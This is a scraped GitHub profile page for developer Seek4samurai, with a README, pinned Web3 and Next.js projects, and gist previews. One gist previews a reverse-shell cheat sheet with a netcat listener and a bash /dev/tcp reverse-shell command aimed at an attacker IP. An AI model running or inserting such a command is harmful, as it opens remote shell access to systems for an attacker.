Skip to content
View Seek4samurai's full-sized avatar
🌏
Working remotely...
🌏
Working remotely...
  • Sony
  • India
  • 19:49 - 5h30m ahead

Organizations

@Design-and-Code

Block or report Seek4samurai

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
Seek4samurai/README.md

Hi 👋, I'm Gourav

Have an idea? Drop me a Mail or DM.

I like to work on Ethereum blockchain, Crypto, Web application, Security Ops, Cloud/Serverless applications, & Integrations.

seek4samurai

Pinned Loading

  1. ethereum-org-website Public

    Forked from ethereum/ethereum-org-website

    Ethereum.org is a primary online resource for the Ethereum community.

    Markdown 2

  2. Medusa-NextJs-StoreFront Public

    Medusa + Next.js starter frontend UI project as a part of Open source contribution. A beautiful Next.js based storefront for @medusajs

    JavaScript 26 7

  3. project-giga-cat Public

    Nyan cat game with MetaMask authentication for Web 3.0 ecosystem. Made out of Next.js & Moralis. Database powered by @redis (Currently in hibernation)

    JavaScript 7

  4. noir Public

    NextJs application for real time messaging. Built in NextJs, firebase, Mui and styled-components. Take a glance over the amazing UI of this application.

    JavaScript 4

  5. nmap-descTags
    1
    Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.
    2
    
                  
    3
    Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, 
    4
    what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
    5
    
                  
  6. code-execution-reverse-shell-command...
    1
    The following examples assums the hacker IP is 10.20.14 and use port 8080 for the connection.
    2
    Therefore in all f these cases you need to listen for port 8080 using the foolowing command `nc -vv -l -p 8080`
    3
    
                  
    4
    BASH
    5
    bash -i >& /dev/tcp/10.20.14.203/8080 0>&1

33 contributions in the last year

Contribution Graph
Day of Week March April May June July August September October November December January February
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Less
No contributions.
Low contributions.
Medium-low contributions.
Medium-high contributions.
High contributions.
More

Activity overview

Contributed to Seek4samurai/rec-io, Seek4samurai/streamlit-deploy, Seek4samurai/bfmform and 2 other repositories
Loading A graph representing Seek4samurai's contributions from March 03, 2024 to March 05, 2025. The contributions are 96% commits, 4% issues, 0% pull requests, 0% code review.

Contribution activity

March 2025

Seek4samurai has no activity yet for this period.
Loading

Seeing something unexpected? Take a look at the GitHub profile guide.